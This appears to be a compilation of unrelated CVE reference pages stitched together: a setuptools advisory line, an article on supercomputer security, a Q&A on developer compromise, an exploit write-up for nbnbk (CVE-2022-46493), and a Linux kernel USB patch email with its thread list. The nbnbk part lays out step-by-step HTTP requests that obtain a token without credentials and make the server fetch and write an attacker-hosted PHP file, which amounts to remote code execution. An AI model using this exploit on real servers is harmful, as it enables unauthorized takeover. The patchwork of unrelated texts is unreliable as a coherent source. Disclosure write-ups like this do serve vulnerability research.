An issue discovered in Python Packaging Authority (PyPA) setuptools 65.3.0 and earlier allows remote attackers to cause a denial of service via crafted HTML package or custom PackageIndex page.

CVE-2022-40897: setuptools/package_index.py at fe8a98e696241487ba6ac9f91faa38ade939ec5d · pypa/setuptools

Vendors and operators attempt to balance power and security, but right now, power is the highest goal.

SUPERCOMPUTING 2022 — How do you keep the bad guys out of some of the world's fastest computers that store some of the most sensitive data?

That was a growing concern at last month's Supercomputing 2022 conference. Achieving the fastest system performance was a hot topic, like it is every year. But the pursuit of speed has come at the cost of securing some of these systems, which run critical workloads in science, weather modeling, economic forecasting, and national security.

Implementing security in the form of hardware or software typically involves a performance penalty, which slows down overall system performance and the output of computations. The push for more horsepower in supercomputing has made security an afterthought.

"For the most part, it's about high-performance computing. And sometimes some of these security mechanisms will reduce your performance because you are doing some checks and balances," says Jeff McVeigh, vice president and general manager of Super Compute Group at Intel.

"There's also a 'I want to make sure I'm getting the best possible performance, and if I can put in other mechanisms to control how this is being securely executed, I'll do that,'" McVeigh says.

**Security Needs Incentivizing**

Performance and data security is a constant tussle between the vendors selling the high-performance systems and the operators who are running the installation.

"Many vendors are reluctant to make these changes if the change negatively impacts the system performance," said Yang Guo, a computer scientist at the National Institutes for Standards and Technology (NIST), during a panel session at Supercomputing 2022.

The lack of enthusiasm for securing high-performance computing systems has prompted the US government to step in, with the NIST creating a working group to address the issue. Guo is leading the NIST HPC Working Group, which focuses on developing guidelines, blueprints, and safeguards for system and data security.

The HPC Working Group was created in January 2016 based on then-President Barack Obama's Executive Order 13702, which launched the National Strategic Computing Initiative. The group's activity picked up after a spate of attacks on supercomputers in Europe, some of which were involved in COVID-19 research.

**HPC Security Is Complicated**

Security in high-performance computing is not as simple as installing antivirus and scanning emails, Guo said.

High-performance computers are shared resources, with researchers booking time and connecting into systems to conduct calculations and simulations. Security requirements will vary based on HPC architectures, some of which may prioritize access control, or hardware like storage, faster CPUs, or more memory for calculations. The top focus is on securing the container and sanitizing computing nodes that pertain to projects on HPC, Guo said.

Government agencies dealing in top-secret data take a Fort Knox-style approach to secure systems by cutting off regular network or wireless access. The "air-gapped" approach helps ensure that malware does not invade the system, and that only authorized users with clearance have access to such systems.

Universities also host supercomputers, which are accessible to students and academics conducting scientific research. Administrators of these systems in many cases have limited control over security, which is managed by system vendors who want bragging rights for building the world's fastest computers.

When you place management of the systems in the hand of vendors, they will prioritize guaranteeing certain performance capabilities, said Rickey Gregg, cybersecurity program manager at the US Department of Defense's High Performance Computing Modernization Program, during the panel.

"One of the things that I was educated on many years ago was that the more money we spend on security, the less money we have for performance. We are trying to make sure that we have this balance," Gregg said.

During a question-and answer session following the panel, some system administrators expressed frustration at vendor contracts that prioritize performance in the system and deprioritize security. The system administrators said that implementing homegrown security technologies would amount to breach of contract with the vendor. That kept their system exposed.

Some panelists said that contracts could be tweaked with language in which vendors hand over security to on-site staff after a certain period of time.

**Different Approaches to Security**

The SC show floor hosted government agencies, universities, and vendors talking about supercomputing. The conversations about security were mostly behind closed doors, but the nature of supercomputing installations provided a birds-eye view of the various approaches to securing systems.

At the booth of the University of Texas at Austin's Texas Advanced Computing Center (TACC), which hosts multiple supercomputers in the Top500 list of the world's fastest supercomputers, the focus was on performance and software. TACC supercomputers get scanned regularly, and the center has tools in place to prevent invasions and two-factor authentication to authorize legit users, representatives said.

The Department of Defense has more of a "walled garden" approach, with users, workloads, and supercomputing resources segmented into a DMZ-stye border area with heavy protections and monitoring of all communications.

The Massachusetts Institute of Technology (MIT) is taking a zero-trust approach to system security by getting rid of root access. Instead it uses a command line entry called sudo to provide root privilege to HPC engineers. The sudo command provides a trail of activities HPC engineers undertake on the system, said Albert Reuther, senior staff member in the MIT Lincoln Laboratory Supercomputing Center, during the panel discussion.

"What we're really after is that auditing of who is at the keyboard, who was that person," Reuther said.

**Improving Security at the Vendor Level**

The general approach to high-performance computing has not changed in decades, with a heavy reliance on giant on-site installations with interconnected racks. That is in sharp contrast to the commercial computing market, which is moving offsite and to the cloud. Participants at the show expressed concerns about data security once it leaves on-premises systems.

AWS is trying to modernize HPC by bringing it to the cloud, which can scale up performance on demand while maintaining a higher level of security. In November, the company introduced HPC7g, a set of cloud instances for high-performance computing on Elastic Compute Cloud (EC2). EC2 employs a special controller called Nitro V5 that provides a confidential computing layer to protect data as it is stored, processed, or in transit.

"We use various hardware additions to typical platforms to manage things like security, access controls, network encapsulation, and encryption," said Lowell Wofford, AWS principal specialist solution architect for high performance computing, during the panel. He added that hardware techniques provide both the security and bare-metal performance in virtual machines.

Intel is building confidential computing features like Software Guard Extensions (SGX), a locked enclave for program execution, into its fastest server chips. According to Intel's McVeigh, a lackadaisical approach by operators is prompting the chip maker to jump ahead in securing high-performance systems.

"I remember when security wasn't important in Windows. And then they realized 'If we make this exposed and every time anyone does anything, they're going to worry about their credit card information being stolen,'" McVeigh said. "So there is a lot of effort there. I think the same things need to apply \[in HPC\]."

Security Is a Second-Class Citizen in High-Performance Computing

What is the worst that can happen when a developer's machine is compromised? Depending on the developer's position, attackers gain access to nearly everything: SSH keys, credentials, access to CI/CD pipelines and production infrastructure, the works.

**Question: What kind of data can an attacker steal after compromising a developer?**

**Louis Lang, security researcher, CTO of Phylum**: We have spent a long time convincing people they shouldn’t open email attachments from unknown senders. We have spent considerably less time convincing the wider developer community that installing packages from unknown sources is a terrible idea.

While phishing campaigns remain effective, they often land the attacker in some unrelated part of the organization and still require a pivot to the final target. Supply chain attacks cut to the heart of the organization, compromising the developer and their privileged accesses. In some cases, like typosquatting and dependency confusion, these attacks are carried out without direct communication between the attacker and the developer. There is no email attachment to open since the developer willingly pulls in the code (which contains the malware).

So what can an attacker steal if they compromise a developer? Depending on the developer's position, nearly everything. Assuming a compromise has occurred, in the absolute best case, the attacker may have gained access to a junior engineer's machine. We’d expect this engineer to, at the very least, have commit access to source code. If the organization has poor software engineering practices (e.g., no code reviews and no limits on who can commit to the main branch), the attacker has free reign to modify the organization's source code at will; to modify and infect the product that you ship to customers.

In the worst and equally likely case, the attacker will gain access to a senior developer with more privileges. This developer will have access to source code, SSH keys, secrets, credentials, CI/CD pipelines, and production infrastructure and likely the ability to bypass certain code checks. This scenario, where this kind of an engineer is compromised, would be devastating for an organization.

This is not hypothetical, either. Malware packages are routinely being published into open-source ecosystems. Nearly all of this malware is tailor-made to exfiltrate credentials and other files deemed sensitive or important. In more recent campaigns, attackers have even attempted to drop ransomware directly onto developer machines as a way to extort cryptocurrency from the organization.

Software developers sit in a privileged position in any technical organization. With their upstream access to the products shipped to customers and access to production systems and infrastructure, they are the lynchpin in any modern organization. A failure to defend the developer is a failure of the security organization as a whole and could lead to catastrophic consequences.

What Kind of Data Gets Stolen When a Developer is Compromised?

Default version of nbnbk was discovered to contain an arbitrary file upload vulnerability via the component /api/User/download_img.

**nbnbk 存在任意文件上传 Getshell**

Nbnbk has any file upload Getshell

**0x00 前言 Preface**

该漏洞无需账号密码即可任意文件上传 Getshell，相当于两步请求直接获取机器权限。

漏洞存在版本：default

This vulnerability allows any file to be uploaded to the Getshell without an account password, which is equivalent to two-step requests for direct access to the machine.

Vulnerability Existing Version: default

**0x01 漏洞复现 Vulnerability Reproduction****1.获取 token**

文件上传的接口需要 access\_token ，我们可以通过下面这个接口获取

Get token

The interface for file upload requires access\_ Token, we can get it from this interface

POST /api/login/wx\_login HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Connection: close

openid=1&unionid=1&sex=1&head\_img=1&nickname=1

可以在返回包中发现 token 已经生成  
You can find that token has been generated in the return package

    HTTP/1.1 200 OK
    Date: Wed, 02 Mar 2022 01:37:25 GMT
    Server: Apache/2.4.46 (Unix) mod_fastcgi/mod_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod_wsgi/3.5 Python/2.7.13
    X-Powered-By: PHP/7.4.21
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET,POST
    Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
    Content-Length: 831
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    {"code":0,"msg":"登录成功","data":{"id":10,"parent_id":0,"invite_code":"","mobile":"","email":"","nickname":"1","user_name":"u10","pay_password":0,"head_img":"1","sex":1,"birthday":"1990-01-01","money":"0.00","commission":"0.00","commission_available":"0.00","consumption_money":"0.00","frozen_money":"0.00","point":0,"user_rank":0,"user_rank_points":0,"address_id":0,"openid":"1","unionid":"1","refund_account":"","refund_name":"","signin_time":0,"group_id":50,"status":0,"add_time":1646141434,"update_time":1646141434,"delete_time":0,"login_time":1646185046,"reciever_address":null,"collect_goods_count":0,"bonus_count":0,"status_text":"正常","sex_text":"男","user_rank_text":null,"token":{"id":15,"token":"87b5fd1230df78dad5a62924426a9a6d","type":2,"user_id":10,"data":"","expire_time":1648733458,"add_time":1646141458}}}
    

**2.在 vps 中启动 http 服务**

Start HTTP service in VPS

echo '<?php phpinfo();' \> index.php
python -m http.server 8099

**3.文件上传**

File Upload

POST /api/User/download\_img HTTP/1.1
Host: nbnbk:8888
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close

access\_token=87b5fd1230df78dad5a62924426a9a6d&url=http://127.0.0.1:8099/index.php&path=info.php

这里的 access\_token 就是上面获取的 token，url 是文件地址，path 是文件名  
Access\_here Token is the token obtained above, URL is the file address, path is the file name.

返回 200 表示成功，我们直接访问 http://nbnbk:8888/info.php 可以看到已经写入文件并能成功解析。

Back to 200 means success, we visit directly http://nbnbk:8888/info.php You can see that the file has been written and parsed successfully.

**0x02 漏洞分析**

Vulnerability Analysis

**1.发现危险函数**

Discover danger function

通过全局搜索 fopen 这个打开文件的函数，发现了 api 下面存在一个 path 用变量来控制，极有肯能存在问题。  
By searching fopen, an open file function globally, we found that there is a path under the API that is controlled by variables, which is probably problematic.

双击后可以发现是一个 download\_img 的函数，其中 url 和 path 变量是可控的。  
Double-click to find a download\_ Function of img where url and path variables are controllable.

这里直接使用 curl 访问了我们提供的 url 并且 path 也没有做任何过滤。直接读文件写到指定目录。  
Curl is used directly here to access the url'we provided and path\` does not filter at all. Read the file directly to the specified directory.

直接构造路近请求但是提示 token 错误，下一步我们需要获得 token。  
Construct the approach request directly but prompt token error, we need to get token next.

**2.获取token**

Get token

看源码可以知道，一定是要登陆才能调用到 getToken 。可以通过注册登陆的方式来获取，但是如果关闭了注册功能、注册功能失效，我们就没法获取 token 了。有没有不需要有账号密码即可获取 token 的方式？

我们继续来看登陆功能的 Login.php 发现提供了一种不需要账号密码就可以登陆的方式。

Looking at the source code, you know that you must be logged in to call getToken'. It can be obtained by registering for login, but if the registration function is turned off and the registration function is invalid, we will not be able to get token'. Is there a way to get \`token'without an account password?

Let's move on to Login'for login functionality. PhpDiscovery provides a way to log in without an account password.

进一步跟进 wxLogin 函数  
Follow Up wxLogin Function

1.  折叠函数里包含了输入内容的校验，大概意思是用户不存在可以创建一个新的，这里我们可以不用管。
2.  通过了校验之后会生成新的 token

1.The collapse function contains a check of the input content, which probably means that the user does not exist and can create a new one, which we can ignore here.

2.New \`token'will be generated after passing the check

我们直接构造数据包，填入需要的字段即可直接拿到生成的 token。到这里分析就结束了。

We construct the data package directly and fill in the required fields to get the generated token. The analysis is over here.

CVE-2022-46493: 🛡️  Nbnbk has any file upload Getshell · Issue #1 · Fanli2012/nbnbk

A flaw incorrect access control in the Linux kernel USB core subsystem was found in the way user attaches usb device. A local user could use this flaw to crash the system.

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
	stable@vger.kernel.org, Alan Stern <stern@rowland.harvard.edu>,
	Rondreis <linhaoguo86@gmail.com>
Subject: \[PATCH 5.4 053/108\] USB: core: Prevent nested device-reset calls
Date: Tue, 13 Sep 2022 16:06:24 +0200	\[thread overview\]
Message-ID: <20220913140355.910732567@linuxfoundation.org> (raw)
In-Reply-To: <20220913140353.549108748@linuxfoundation.org\>

From: Alan Stern <stern@rowland.harvard.edu>

commit 9c6d778800b921bde3bff3cff5003d1650f942d1 upstream.

Automatic kernel fuzzing revealed a recursive locking violation in
usb-storage:

============================================
WARNING: possible recursive locking detected
5.18.0 #3 Not tainted
--------------------------------------------
kworker/1:3/1205 is trying to acquire lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

but task is already holding lock:
ffff888018638db8 (&us\_interface\_key\[i\]){+.+.}-{3:3}, at:
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230

...

stack backtrace:
CPU: 1 PID: 1205 Comm: kworker/1:3 Not tainted 5.18.0 #3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Workqueue: usb\_hub\_wq hub\_event
Call Trace:
<TASK>
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]
dump\_stack\_lvl+0xcd/0x134 lib/dump\_stack.c:106
print\_deadlock\_bug kernel/locking/lockdep.c:2988 \[inline\]
check\_deadlock kernel/locking/lockdep.c:3031 \[inline\]
validate\_chain kernel/locking/lockdep.c:3816 \[inline\]
\_\_lock\_acquire.cold+0x152/0x3ca kernel/locking/lockdep.c:5053
lock\_acquire kernel/locking/lockdep.c:5665 \[inline\]
lock\_acquire+0x1ab/0x520 kernel/locking/lockdep.c:5630
\_\_mutex\_lock\_common kernel/locking/mutex.c:603 \[inline\]
\_\_mutex\_lock+0x14f/0x1610 kernel/locking/mutex.c:747
usb\_stor\_pre\_reset+0x35/0x40 drivers/usb/storage/usb.c:230
usb\_reset\_device+0x37d/0x9a0 drivers/usb/core/hub.c:6109
r871xu\_dev\_remove+0x21a/0x270 drivers/staging/rtl8712/usb\_intf.c:622
usb\_unbind\_interface+0x1bd/0x890 drivers/usb/core/driver.c:458
device\_remove drivers/base/dd.c:545 \[inline\]
device\_remove+0x11f/0x170 drivers/base/dd.c:537
\_\_device\_release\_driver drivers/base/dd.c:1222 \[inline\]
device\_release\_driver\_internal+0x1a7/0x2f0 drivers/base/dd.c:1248
usb\_driver\_release\_interface+0x102/0x180 drivers/usb/core/driver.c:627
usb\_forced\_unbind\_intf+0x4d/0xa0 drivers/usb/core/driver.c:1118
usb\_reset\_device+0x39b/0x9a0 drivers/usb/core/hub.c:6114

This turned out not to be an error in usb-storage but rather a nested
device reset attempt.  That is, as the rtl8712 driver was being
unbound from a composite device in preparation for an unrelated USB
reset (that driver does not have pre\_reset or post\_reset callbacks),
its ->remove routine called usb\_reset\_device() -- thus nesting one
reset call within another.

Performing a reset as part of disconnect processing is a questionable
practice at best.  However, the bug report points out that the USB
core does not have any protection against nested resets.  Adding a
reset\_in\_progress flag and testing it will prevent such errors in the
future.

Link: https://lore.kernel.org/all/CAB7eexKUpvX-JNiLzhXBDWgfg2T9e9\_0Tw4HQ6keN==voRbP0g@mail.gmail.com/
Cc: stable@vger.kernel.org
Reported-and-tested-by: Rondreis <linhaoguo86@gmail.com>
Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Link: https://lore.kernel.org/r/YwkflDxvg0KWqyZK@rowland.harvard.edu
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
 drivers/usb/core/hub.c |   10 ++++++++++
 include/linux/usb.h    |    2 ++
 2 files changed, 12 insertions(+)

--- a/drivers/usb/core/hub.c
+++ b/drivers/usb/core/hub.c
@@ -5923,6 +5923,11 @@ re\_enumerate\_no\_bos:
  \* the reset is over (using their post\_reset method).
  \*
  \* Return: The same as for usb\_reset\_and\_verify\_device().
+ \* However, if a reset is already in progress (for instance, if a
+ \* driver doesn't have pre\_ or post\_reset() callbacks, and while
+ \* being unbound or re-bound during the ongoing reset its disconnect()
+ \* or probe() routine tries to perform a second, nested reset), the
+ \* routine returns -EINPROGRESS.
  \*
  \* Note:
  \* The caller must own the device lock.  For example, it's safe to use
@@ -5956,6 +5961,10 @@ int usb\_reset\_device(struct usb\_device \*
 		return -EISDIR;
 	}
 
+	if (udev->reset\_in\_progress)
+		return -EINPROGRESS;
+	udev->reset\_in\_progress = 1;
+
 	port\_dev = hub->ports\[udev->portnum - 1\];
 
 	/\*
@@ -6020,6 +6029,7 @@ int usb\_reset\_device(struct usb\_device \*
 
 	usb\_autosuspend\_device(udev);
 	memalloc\_noio\_restore(noio\_flag);
+	udev->reset\_in\_progress = 0;
 	return ret;
 }
 EXPORT\_SYMBOL\_GPL(usb\_reset\_device);
--- a/include/linux/usb.h
+++ b/include/linux/usb.h
@@ -580,6 +580,7 @@ struct usb3\_lpm\_parameters {
  \* @devaddr: device address, XHCI: assigned by HW, others: same as devnum
  \* @can\_submit: URBs may be submitted
  \* @persist\_enabled:  USB\_PERSIST enabled for this device
+ \* @reset\_in\_progress: the device is being reset
  \* @have\_langid: whether string\_langid is valid
  \* @authorized: policy has said we can use it;
  \*	(user space) policy determines if we authorize this device to be
@@ -665,6 +666,7 @@ struct usb\_device {
 
 	unsigned can\_submit:1;
 	unsigned persist\_enabled:1;
+	unsigned reset\_in\_progress:1;
 	unsigned have\_langid:1;
 	unsigned authorized:1;
 	unsigned authenticated:1;

next prev parent reply	other threads:\[~2022-09-13 15:01 UTC|newest\]

**Thread overview:** 114+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
2022-09-13 14:05 \[PATCH 5.4 000/108\] 5.4.212-rc1 review Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 001/108\] efi: capsule-loader: Fix use-after-free in efi\_capsule\_write Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 002/108\] wifi: iwlegacy: 4965: corrected fix for potential off-by-one overflow in il4965\_rs\_fill\_link\_cmd() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 003/108\] net: mvpp2: debugfs: fix memory leak when using debugfs\_lookup() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 004/108\] fs: only do a memory barrier for the first set\_buffer\_uptodate() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 005/108\] Revert "mm: kmemleak: take a full lowmem check in kmemleak\_\*\_phys()" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 006/108\] net: dp83822: disable false carrier interrupt Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 007/108\] drm/msm/dsi: fix the inconsistent indenting Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 008/108\] drm/msm/dsi: Fix number of regulators for msm8996\_dsi\_cfg Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 009/108\] platform/x86: pmc\_atom: Fix SLP\_TYPx bitfield mask Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 010/108\] iio: adc: mcp3911: make use of the sign bit Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 011/108\] ieee802154/adf7242: defer destroy\_workqueue call Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 012/108\] wifi: cfg80211: debugfs: fix return type in ht40allow\_map\_read() Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 013/108\] Revert "xhci: turn off port power in shutdown" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 014/108\] net: sched: tbf: dont call qdisc\_put() while holding tree lock Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 015/108\] ethernet: rocker: fix sleep in atomic context bug in neigh\_timer\_handler Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 016/108\] kcm: fix strp\_init() order and cleanup Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 017/108\] sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 018/108\] tcp: annotate data-race around challenge\_timestamp Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 019/108\] Revert "sch\_cake: Return \_\_NET\_XMIT\_STOLEN when consuming enqueued skb" Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 020/108\] net/smc: Remove redundant refcount increase Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 021/108\] serial: fsl\_lpuart: RS485 RTS polariy is inverse Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 022/108\] staging: rtl8712: fix use after free bugs Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 023/108\] powerpc: align syscall table for ppc32 Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 024/108\] vt: Clear selection before changing the font Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 025/108\] tty: serial: lpuart: disable flow control while waiting for the transmit engine to complete Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 026/108\] Input: iforce - wake up after clearing IFORCE\_XMIT\_RUNNING flag Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 027/108\] iio: adc: mcp3911: use correct formula for AD conversion Greg Kroah-Hartman
2022-09-13 14:05 \` \[PATCH 5.4 028/108\] misc: fastrpc: fix memory corruption on probe Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 029/108\] misc: fastrpc: fix memory corruption on open Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 030/108\] USB: serial: ftdi\_sio: add Omron CS1W-CIF31 device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 031/108\] binder: fix UAF of ref->proc caused by race condition Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 032/108\] usb: dwc3: qcom: fix use-after-free on runtime-PM wakeup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 033/108\] drm/i915/reg: Fix spelling mistake "Unsupport" -> "Unsupported" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 034/108\] clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 035/108\] Revert "clk: core: Honor CLK\_OPS\_PARENT\_ENABLE for clk gate ops" Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 036/108\] clk: core: Fix runtime PM sequence in clk\_core\_unprepare() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 037/108\] Input: rk805-pwrkey - fix module autoloading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 038/108\] clk: bcm: rpi: Fix error handling of raspberrypi\_fw\_get\_rate Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 039/108\] hwmon: (gpio-fan) Fix array out of bounds access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 040/108\] gpio: pca953x: Add mutex\_lock for regcache sync in PM Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 041/108\] thunderbolt: Use the actual buffer in tb\_async\_error() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 042/108\] xhci: Add grace period after xHC start to prevent premature runtime suspend Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 043/108\] USB: serial: cp210x: add Decagon UCA device id Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 044/108\] USB: serial: option: add support for OPPO R11 diag port Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 045/108\] USB: serial: option: add Quectel EM060K modem Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 046/108\] USB: serial: option: add support for Cinterion MV32-WA/WB RmNet mode Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 047/108\] usb: typec: altmodes/displayport: correct pin assignment for UFP receptacles Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 048/108\] usb: dwc2: fix wrong order of phy\_power\_on and phy\_init Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 049/108\] USB: cdc-acm: Add Icom PMR F3400 support (0c26:0020) Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 050/108\] usb-storage: Add ignore-residue quirk for NXP PN7462AU Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 051/108\] s390/hugetlb: fix prepare\_hugepage\_range() check for 2 GB hugepages Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 052/108\] s390: fix nospec table alignments Greg Kroah-Hartman
**2022-09-13 14:06 \` Greg Kroah-Hartman \[this message\]**
2022-09-13 14:06 \` \[PATCH 5.4 054/108\] usb: gadget: mass\_storage: Fix cdrom data transfers on MAC-OS Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 055/108\] driver core: Dont probe devices after bus\_type.match() probe deferral Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 056/108\] wifi: mac80211: Dont finalize CSA in IBSS mode if state is disconnected Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 057/108\] ip: fix triggering of icmp redirect Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 058/108\] net: mac802154: Fix a condition in the receive path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 059/108\] ALSA: seq: oss: Fix data-race for max\_midi\_devs access Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 060/108\] ALSA: seq: Fix data-race at module auto-loading Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 061/108\] drm/i915/glk: ECS Liva Q2 needs GLK HDMI port timing quirk Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 062/108\] btrfs: harden identification of a stale device Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 063/108\] usb: dwc3: fix PHY disable sequence Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 064/108\] usb: dwc3: disable USB core PHY management Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 065/108\] USB: serial: ch341: fix lost character on LCR updates Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 066/108\] USB: serial: ch341: fix disabled rx timer on older devices Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 067/108\] scsi: megaraid\_sas: Fix double kfree() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 068/108\] drm/gem: Fix GEM handle release errors Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 069/108\] drm/amdgpu: Check num\_gfx\_rings for gfx v9\_0 rb setup Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 070/108\] drm/radeon: add a force flush to delay work when radeon Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 071/108\] parisc: ccio-dma: Handle kmalloc failure in ccio\_init\_resources() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 072/108\] parisc: Add runtime check to prevent PA2.0 kernels on PA1.x machines Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 073/108\] arm64: cacheinfo: Fix incorrect assignment of signed error value to unsigned fw\_level Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 074/108\] arm64/signal: Raise limit on stack frames Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 075/108\] fbdev: chipsfb: Add missing pci\_disable\_device() in chipsfb\_pci\_init() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 076/108\] drm/amdgpu: mmVM\_L2\_CNTL3 register not initialized correctly Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 077/108\] ALSA: emu10k1: Fix out of bounds access in snd\_emu10k1\_pcm\_channel\_alloc() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 078/108\] ALSA: aloop: Fix random zeros in capture data when using jiffies timer Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 079/108\] ALSA: usb-audio: Fix an out-of-bounds bug in \_\_snd\_usb\_parse\_audio\_interface() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 080/108\] kprobes: Prohibit probes in gate area Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 081/108\] debugfs: add debugfs\_lookup\_and\_remove() Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 082/108\] nvmet: fix a use-after-free Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 083/108\] scsi: mpt3sas: Fix use-after-free warning Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 084/108\] scsi: lpfc: Add missing destroy\_workqueue() in error path Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 085/108\] cgroup: Optimize single thread migration Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 086/108\] cgroup: Elide write-locking threadgroup\_rwsem when updating csses on an empty subtree Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 087/108\] cgroup: Fix threadgroup\_rwsem <-> cpus\_read\_lock() deadlock Greg Kroah-Hartman
2022-09-13 14:06 \` \[PATCH 5.4 088/108\] smb3: missing inode locks in punch hole Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 089/108\] ARM: dts: imx6qdl-kontron-samx6i: remove duplicated node Greg Kroah-Hartman
2022-09-13 14:07 \` \[PATCH 5.4 090/108\] regulator: core: Clean up on enable failure Greg Kroah-Hartman
